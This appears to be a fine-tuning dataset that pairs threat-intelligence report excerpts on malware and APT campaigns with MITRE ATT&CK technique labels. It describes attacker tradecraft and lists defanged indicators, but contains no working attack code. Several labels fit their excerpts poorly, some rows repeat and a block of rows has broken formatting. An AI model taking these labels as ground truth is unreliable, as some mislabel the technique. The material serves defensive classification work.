"ESET researchers have discovered several previously undocumented post-compromise tools used by the highly active Gamaredon threat group in various malicious campaigns. One tool, a VBA macro targeting Microsoft Outlook, uses the target’s email account to send spearphishing emails to contacts in the victim’s Microsoft Office address book. We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents","['T1039 - Data from Network Shared Drive', 'T1204.002 - User Execution: Malicious File', 'T1534 - Internal Spearphishing', 'T1083 - File and Directory Discovery']",fine_tune
"We have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server","['T1083 - File and Directory Discovery']",fine_tune
"Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. BlackEnergy2 was eventually seen downloading more crimeware plugins – a custom spam plugin and a banking information stealer custom plugin. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called “Sandworm Team” also","['T1082 - System Information Discovery']",fine_tune
"dellLemb||> deletes the registry key \Software\Microsoft\Internet Explorer\notes. EXECPROGAM calls ShellExecute to run the application given in the command. NOVOLEMBRETE creates and stores data sent with the command in the registry key \Software\Microsoft\Internet Explorer\notes","['T1070 - Indicator Removal on Host']",fine_tune
"Check for Skype connectivity - Download and install Skype - Encoded communication with its C2 - Execute commands sent from the C2 server - Get multifactor authentication settings - Get the currently logged on user and OS version","['T1132.001 - Data Encoding: Standard Encoding']",fine_tune
"The fourth-stage wiper starts off by enumerating from A to Z, looking for fixed and remote logical drives in the system. Enumerates logical drives. For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the ""%HOMEDRIVE%\Windows"" directory","['T1049 - System Network Connections Discovery', 'T1082 - System Information Discovery']",fine_tune
"1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant","['T1036.007 - Masquerading: Double File Extension']",fine_tune
"WMIC (wmic.exe) was used to create a remote command prompt instance (cmd.exe), which then executed the PowerShell code. The PowerShell command created two variables and attempted to download and execute the payload from one of FIN8’s Command and Control (C&C) servers. This download was blocked by Bitdefender; the description below is based on interpretation of variables discovered in our previous analysis of FIN8 operations","['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1105 - Ingress Tool Transfer', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell']",fine_tune
"mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. This process runs as a high-integrity process by default, since it's set to auto-elevate within its manifest","['T1134.002 - Create Process with Token']",fine_tune
"After downloading the executable payload, the secondary VBScript runs the following command on the command line (T1059) to kill any existing msiexec.exe process instances and use the ping application to sleep for two seconds before using the legitimate msiexec.exe application (T1218) to launch the downloaded PlayerVLC.msi file","['T1105 - Ingress Tool Transfer']",fine_tune
"In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams. This knowledge is reflected in the actor’s operational decisions, from the choice of command-and-control (C2) infrastructure to the naming of scheduled tasks used to maintain persistence","['T1053.005 - Scheduled Task/Job: Scheduled Task']",fine_tune
"Once elevated, the ransomware will write a copy of a random file from System32 to the %APPDATA% directory. The newly copied file will have a random and hidden filename. This process allows for the ransomware to copy itself into the file by way of an alternate data stream (ADS","['T1564.004 - Hide Artifacts: NTFS File Attributes']",fine_tune
"The Trojan sends an email to sahro.bella7[at]post.cz with sysscr.ops as the attachment, the string SCreen within the body and a subject with the unique system identifier via SMTPS from one of three previously used accounts. If the actor wishes to download an additional payload to the compromised host, they will respond by sending emails in the following steps. 3) The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as a subject with a secondary email account and credentials in ASCII hexadecimal format within the message body. This secondary email account is unknown at this time, so we will refer to it as ""secondary email account"" in future steps. 4) The actor sends an email to the secondary email account with the unique system identifier as a subject with a secondary payload attached with a filename of txt. Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the secondary email account. 7) The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as a subject with a file path that the Cannon Trojan will use to save the secondary payload. 8) Cannon logs into the secondary email account via POP3S looking for emails with a subject that matches the unique system identifier. Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded auddevc.txt file. 12) Cannon moves the downloaded file to the specified path","['T1105 - Ingress Tool Transfer']",fine_tune
"Another relationship we have mentioned repeatedly is the use of the SYSCON malware family. This particular malware family was first reported in October 2017 and has been observed delivering decoy documents pertaining to North Korea. The malware is generally unsophisticated, making use of remote FTP servers for C2 communication","['T1071.002 - File Transfer Protocols']",fine_tune
"It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard-coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious DLL into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPS if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests","['T1071.001 - Application Layer Protocol: Web Protocols']",fine_tune
"This backdoor adds the following registry entries to enable its automatic execution at every system startup","['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']",fine_tune
"Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling ""PoetRAT."" The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operator. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically","['T1056.001 - Input Capture: Keylogging']",fine_tune
"The batch files appear to be used to load the Cobalt Strike beacon, but also to perform discovery commands on the compromised system","['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']",fine_tune
"The actor has distributed its dropper embedded in an archive file (외교부 가판 2021-05-07.zip) as an attachment through spearphishing emails. The archive file contains a JavaScript file (외교부 가판 2021-05-07.pdf.jse) which pretends to be a PDF file that contains two Base64 encoded blobs. The first one is the content of the decoy PDF file in Base64 format and the other one contains the AppleSeed payload also in Base64 format (encoded twice","['T1204.002 - User Execution: Malicious File', 'T1027 - Obfuscated Files or Information']",fine_tune
"The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. The type of data this implant gathers from the victim’s system","['T1016 - System Network Configuration Discovery', 'T1012 - Query Registry']",fine_tune
"Collected files under the preliminary collection directory will be compressed using a WinRAR instance that the Ramsay Installer drops. This compressed archive will be saved within the preliminary collection directory and then generates a Ramsay container artifact","['T1083 - File and Directory Discovery', 'T1560.001 - Archive Collected Data: Archive via Utility']",fine_tune
"As discussed in the delivery document analysis above, depending on the OS architecture either of the embedded KerrDown DLLs will be dropped on the victim machine. The DLL is dropped in the directory location ‘Users\Administrator\AppData\Roaming\’ as ‘main_background.png’. The DLL retrieves the payload from the URL, decrypts it using the DES algorithm and executes it in memory. Therefore, it is observed that only the KerrDown DLL downloader is saved on the system and the payload is executed directly in memory without being written to disk. Table 1 shows the URL the downloader will attempt to download the payload from depending on the OS architecture of the victim machine","['T1105 - Ingress Tool Transfer']",fine_tune
"To exploit the Log4j vulnerability (CVE-2021-44228), the attackers chose one of the publicly available open-source JNDI Exploit Kits, since removed from GitHub due to its enormous popularity following the vulnerability's emergence. There are multiple analysis papers that explain how the vulnerability can be exploited, so we will skip the details of the actual exploitation step","['T1190 - Exploit Public-Facing Application']",fine_tune
"List of installed antivirus products - OS version - Username - Computer name - Whether any of the following software is installed: Diebold Warsaw GAS Tecnologia (an application to protect access to online banking) Trusteer Several Latin American banking applications - Diebold Warsaw GAS Tecnologia (an application to protect access to online banking) - Trusteer - Several Latin American banking applications","['T1518.001 - Software Discovery: Security Software Discovery']",fine_tune
"All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware","['T1573.001 - Symmetric Cryptography']",fine_tune
"HELLOKITTY is written in C++, but reimplements a significant portion of DEATHRANSOM's functionality using similar loop operations and thread pooling via QueueUserWorkItem. The code structure to enumerate network resources, logical drives, and perform file encryption is very similar. Additionally, HELLOKITTY and DEATHRANSOM share very similar functions to check for the completion status of their encryption threads before exiting","['T1082 - System Information Discovery', 'T1135 - Network Share Discovery']",fine_tune
"In our tests, running Valak from a U.S. location on a vulnerable Windows 10 host returned a banking Trojan called IcedID as the follow-up malware. In one case, we saw both IcedID and NetSupport Manager RAT-based malware delivered as follow-up malware on a Windows 7 host from June 2020","['T1105 - Ingress Tool Transfer']",fine_tune
"AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services. BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session. MURKYTOP: a command-line reconnaissance tool","['T1018 - Remote System Discovery', 'T1135 - Network Share Discovery', 'T1046 - Network Service Discovery', 'T1087.001 - Account Discovery: Local Account']",fine_tune
"Use of obfuscated shellcode executed via PowerShell to download a ""reverse_tcp"" payload from Metasploit onto victim systems","['T1059.001 - Command and Scripting Interpreter: PowerShell']",fine_tune
"At the time of writing, two VBS files have been seen pushed to the target computer by VBShower","['T1105 - Ingress Tool Transfer']",fine_tune
"Another difference in the network traffic generated by the malware is that the encoded proxy information has been added to the URL query values during the C2 communication. Table 4 shows the parameters sent to the C2 server by the backdoor in the newer versions","['T1090.002 - External Proxy']",fine_tune
"Filename: impku.dat:schemas File size: 608854 bytes MD5 hash: b774f39d31c32da0f6a5fb5d0e6d2892 SHA1 hash: ae3ff39c2a7266132e0af016a48b97d565463d90 Notes: Alternate data stream (ADS) PNG file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA","['T1564.004 - Hide Artifacts: NTFS File Attributes']",fine_tune
"After the victim clicks the Enable Content button, the macro commands are executed and invoke the Windows OS process msiexec.exe. This process is the Windows Installer, a software component and application programming interface of Microsoft Windows used for the installation, maintenance, and removal of software","['T1218.007 - Signed Binary Proxy Execution: Msiexec']",fine_tune
"This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In October 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. Aside from that, startup is performed by loading Cobalt Strike into the main memory without saving to the file system. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP/HTTPS/DNS modules and SMB modules. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. To prevent this threat, the company should configure filter rules to detect the above-mentioned tools on the corporate network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and searches for critical servers and the computers from which they are accessed","['T1046 - Network Service Discovery']",fine_tune
"Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called “Sandworm Team” also","['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers']",fine_tune
680All of the bait documents are MHTML ones with malicious macro embedded and the .doc suffix to bypass detection. Below is an example of bait document captured by 360 Threat Intelligence Center in February 2019['T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
6812) The additional commands and execution objects are executed in the machine that has been compromised in the isolated network['T1204.002 - User Execution: Malicious File']fine_tune
682Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands. BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators['T1102.001 - Dead Drop Resolver']fine_tune
683Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript is then run via a scheduled task['T1053.005 - Scheduled Task/Job: Scheduled Task']fine_tune
684The initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page. The page, 29[.]html, contains two distinct sections of scripts. The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT['T1218.005 - Signed Binary Proxy Execution: Mshta']fine_tune
685BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration. In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive['T1560.002 - Archive Collected Data: Archive via Library', 'T1074.001 - Data Staged: Local Data Staging', 'T1049 - System Network Connections Discovery']fine_tune
686The loaded DLL retrieves the path to the Warzone malicious file from HKCU\SOFTWARE\_rptls\Install, iterates through running processes and kills the Warzone process if it already exists. Then it runs the Warzone executable again, this time with Admin privileges['T1055 - Process Injection']fine_tune
687KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes['T1489 - Service Stop']fine_tune
688The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name. The attacker likely utilizes the DGA subdomain to vary the DNS response to victims as a means to control the targeting of the malware. These subdomains are concatenated with one of the following to create the hostname to resolve['T1568 - Dynamic Resolution']fine_tune
689Appendix A – PLAINTEE older variant Older variants of PLAINTEE can be identified via the unique mutex created during runtime. At least three variants of PLAINTEE have been identified to date, however, the following two samples have additional unique differences['T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control']fine_tune
"The fourth spear phishing email of the campaign was sent on January 23, 2018 to a range of targets working for Tibetan NGOs, media groups, and the CTA. The message appeared to be sent from the Director of the Tibet Museum, which is an official museum of the CTA. Attached to the email were RTF and PPSX messages that claimed to present information about the National Museum of Tibet (see Figure 5). These files contained the CVE-2017-11882 and TSSL Suite infection chain","['T1566.001 - Phishing: Spearphishing Attachment']",fine_tune
"The threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information from hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report","['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1113 - Screen Capture']",fine_tune
"Finally, the script stores the encrypted payload in the Windows registry. Note that the attackers seem to use a different registry location per organization. Thus, it is not a useful indicator to detect similar intrusions","['T1112 - Modify Registry']",fine_tune
"HyperStack uses named pipes to execute remote procedure calls (RPC) from the controller to the device hosting the HyperStack client. To move laterally, the implant tries to connect to another remote device’s IPC$ share, either using a null session or default credentials. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from. If the implant’s connection to the IPC$ is successful, the implant can forward RPC commands from the controller to the remote device, and likely has the capability to copy itself onto the remote device","['T1559 - Inter-Process Communication', 'T1078.001 - Valid Accounts: Default Accounts']",fine_tune
"At the time of discovery TEARDROP was a novel concoction: never-before-seen, possibly even tailor-made for this attack. TEARDROP runs in-memory but it does register a Windows service, which involves editing the registry","['T1112 - Modify Registry']",fine_tune
"Hooking module – hooks a hardcoded set of WinAPI and (if they exist) Mozilla DLL functions. Hooking is used to perform web injects, sniff traffic and keyboard data and even prevent DNS resolution of certain domains. Hooking works in the following way: QakBot injects a hooking module into the appropriate process, the module finds functions from the hardcoded set and modifies the functions so they jump to custom code","['T1055 - Process Injection']",fine_tune
"Curiously, the same private session key is also encrypted with another public key hardcoded into the body of the Trojan, regardless of the configuration. It turns out that someone who knows the private key corresponding to the public skeleton key is able to decrypt the victim’s files, even without the private key for sub_key. It seems like the Trojan developers built a loophole into the algorithm allowing them to decrypt files behind the distributors’ back","['T1486 - Data Encrypted for Impact']",fine_tune
"The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail. [14] Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link. Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula. After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview. Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews","['T1583.001 - Domains']",fine_tune
"In the newer attack flows we observed, we once again found valid Certum certificates were used to sign the Bandook malware executable","['T1553.002 - Code Signing']",fine_tune
"The latter does not use libcurl anymore and now uses winhttp to perform all requests to the C2. The use of the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key as a persistence mechanism has been replaced by the creation of a service. The C2 path pattern has also changed; we have identified the following paths: ini.php, info.php and parse_ini_file.php, which are no longer random or animal-name based","['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']",fine_tune
"For the first time, the Bisonal developers decided to use a packer: MPRESS. The Bisonal string also disappears from the binary; however, the workflow of the malware stays the same and some features are copy/pasted from the previous Bisonal variant","['T1027.002 - Obfuscated Files or Information: Software Packing']",fine_tune
"Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. Note: transfer of credentials can occur even if the file is not retrieved. After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication","['T1078 - Valid Accounts']",fine_tune
"The emails first originated from a spoofed sender that impersonated a Meetings Services Assistant at the United Nations General Assembly Secretariat. The threat actor achieved this impersonation by utilizing the legitimate email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service","['T1585.002 - Email Accounts']",fine_tune
"The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks","['T1566.001 - Phishing: Spearphishing Attachment']",fine_tune
"FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging","['T1105 - Ingress Tool Transfer']",fine_tune
"The next program sent to victims enumerates all the drives on the infected system and executes the following command on them","['T1083 - File and Directory Discovery']",fine_tune
"Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe. This module is responsible for launching the document search module, contacting the C2 and exfiltrating the collected documents","['T1020 - Automated Exfiltration', 'T1041 - Exfiltration Over C2 Channel']",fine_tune
"To initially gain access to the environment, Managed Defense analysts identified that FIN6 compromised an internet-facing system. Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows’ Remote Desktop Protocol (RDP","['T1003.001 - OS Credential Dumping: LSASS Memory', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1078 - Valid Accounts']",fine_tune
"Use of Open Source Tools. In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script ""Reorder"", which uses the string formatting functionality within PowerShell to reconstruct strings from out-of-order substrings (e.g. ""{1}{0}"" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis. We captured the commands we ran in Invoke-Obfuscation in the animation in Figure 3 below, which visualizes the steps the threat actor may have taken to create the payload delivered in this attack","['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']",fine_tune
"The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. Afterward, the module will delete old ""sft"" files assuming they were already exfiltrated. After a pause of 6,500 milliseconds, it will start its search for the targeted files. SFT file creation routine. Using the working directory as a base path, which in this sample case is C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\4CA-B25C11-A27BC\, each selected file will be compressed into the file kr.zp","['T1083 - File and Directory Discovery']",fine_tune
"Further research into the IP address hosting the spoofed page revealed a broader campaign to steal credentials. (Figure: Countries with targeted universities. Source: Secureworks) After entering their credentials into the fake login page, victims were redirected to the legitimate website where they were automatically logged into a valid session or were prompted to enter their credentials again. Numerous spoofed domains referenced the targeted universities' online library systems, indicating the threat actors' intent to gain access to these resources. CTU™ researchers were unable to confirm functionality of all identified spoofed pages because some of the domains were not accessible at the time of analysis. Domain registrations indicate the infrastructure to support this campaign was still being created when CTU researchers discovered the activity. A domain registered in May 2018 also contained subdomains spoofing university targets. These subdomains redirected visitors to spoofed login pages on other attacker-controlled domains","['T1583.001 - Domains']",fine_tune
"T1566.001: Spearphishing Attachment - T1566.002: Spearphishing Link - T1566.003: Spearphishing via Service - - - T1204.001: Malicious Link - T1204.002: Malicious File - T1059: Command and Scripting Interpreter T1059.005: Visual Basic - T1059.005: Visual Basic - - T1053.005: Scheduled Task - T1129: Shared Modules - T1106: Native API - T1047: Windows Management Instrumentation - - T1027: Obfuscated Files or Information T1027.002: Software Packing - T1027.002: Software Packing - T1553: Subvert Trust Controls T1553.002: Code Signing - T1553.002: Code Signing - T1218: Signed Binary Proxy Execution T1218.010: Regsvr32 - T1218.010: Regsvr32 - - T1497.001: System Checks - T1497.002: User Activity Based Checks - T1497.003: Time Based Evasion - T1112: Modify Registry - T1070: Indicator Removal on Host T1070.004: File Deletion - T1070.004: File Deletion - T1140: De-obfuscate/Decode Files or Information - - - T1090.003: Multi-hop Proxy - T1105: Ingress Tool Transfer - - T1055: Process Injection T1055.012: Process Hollowing - T1055.012: Process Hollowing - - T1082: System Information Discovery - T1049: System Network Connections Discovery - T1016: System Network Configuration Discovery - T1057: Process Discovery - T1033: System Owner/User Discovery - T1518: Software Discovery T1518.001: Security Software Discovery - T1518.001: Security Software Discovery - Persistence T1546: Event Triggered Execution T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys / Startup Folder - T1546: Event Triggered Execution - T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys / Startup Folder - T1547.001: Registry Run Keys / Startup Folder","['T1070.004 - Indicator Removal on Host: File Deletion']",fine_tune
"After the execution of rundll32.exe, the PowerShell script enu.ps1 is executed. This script is encoded with Base64 in order to avoid detection by antivirus products","['T1027 - Obfuscated Files or Information']",fine_tune
"""Config.json"" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called ""XbashY"" from 3g2upl4pq6kufc4m[.]tk. ""TermsHost.exe"" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into ""Windows processes to bypass firewalls."" The sample grabs the config file ""xmr.txt,"" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file ""dDNLQrsBUE.url"" in the Windows Start Menu Folder","['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']",fine_tune
"""Config.json"" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called ""XbashY"" from 3g2upl4pq6kufc4m[.]tk. ""TermsHost.exe"" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into ""Windows processes to bypass firewalls."" The sample grabs the config file ""xmr.txt,"" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file ""dDNLQrsBUE.url"" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system","['T1027.002 - Obfuscated Files or Information: Software Packing']",fine_tune
"The ROKRAT author implements several techniques typically seen to frustrate human analysts and avoid sandbox execution. First, the malware does not run on Windows XP systems. The code used to perform this task: The malware checks the process names in use on the victim machine. It checks whether the executed process name matches a partial name hardcoded in the sample. Here is the complete list","['T1057 - Process Discovery']",fine_tune
"In this version, a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\Start Menu\Programs\Startup\Anti virus service.lnk. As in the previous version, the ID of the infected system is generated with exactly the same method. The C2 is different and the analysed version this time only contains a single domain","['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']",fine_tune
"If yes, it generates an RSA PKCS key using CryptGenKey that is used for encryption of communication session keys. It then writes the RSA key to the PRVK key in the [Version] section of the config file. Turla’s Carbon backdoor also implements RSA encryption on the session keys for some of its C&C channels","['T1573.002 - Asymmetric Cryptography']",fine_tune
"root/.ssh/{id_rsa, id_rsa.pub} – the SSH key pair used to update the miner from the C&C server using SCP. opt/{bootsync.sh, bootlocal.sh} – the system startup commands that try to update the miner from the C&C server and run it (see Scripts 7 and 8","['T1105 - Ingress Tool Transfer']",fine_tune
"Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","['T1071.001 - Application Layer Protocol: Web Protocols']",fine_tune
"Hardcore Nationalist group SideWinder is a threat group active since 2012 according to Kaspersky. This group mainly targets Pakistani and Chinese military and government entities’ Windows machines. They also target mobile phone devices. This is the second time this group is using a COVID-19 theme to lure victims, thereby capitalizing on the fear of the global pandemic. SideWinder aka HN2 is believed to be an Indian state-sponsored group. A detailed analysis of SideWinder attacks on Pakistani military officials was also published in April","['T1204.002 - User Execution: Malicious File', 'T1204.001 - Malicious Link']",fine_tune
"The SolarWinds Orion API is vulnerable to authentication bypass that could allow a remote attacker to execute API commands","['T1203 - Exploitation for Client Execution']",fine_tune
"Grandoreiro’s DGA uses two strings (prefix and suffix) hardcoded in the binary and the local date as inputs. Note that based on the DGA, a different website is required for each day. We have observed some variants also using a custom base64 alphabet","['T1568.002 - Domain Generation Algorithms']",fine_tune
"WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives","['T1135 - Network Share Discovery']",fine_tune
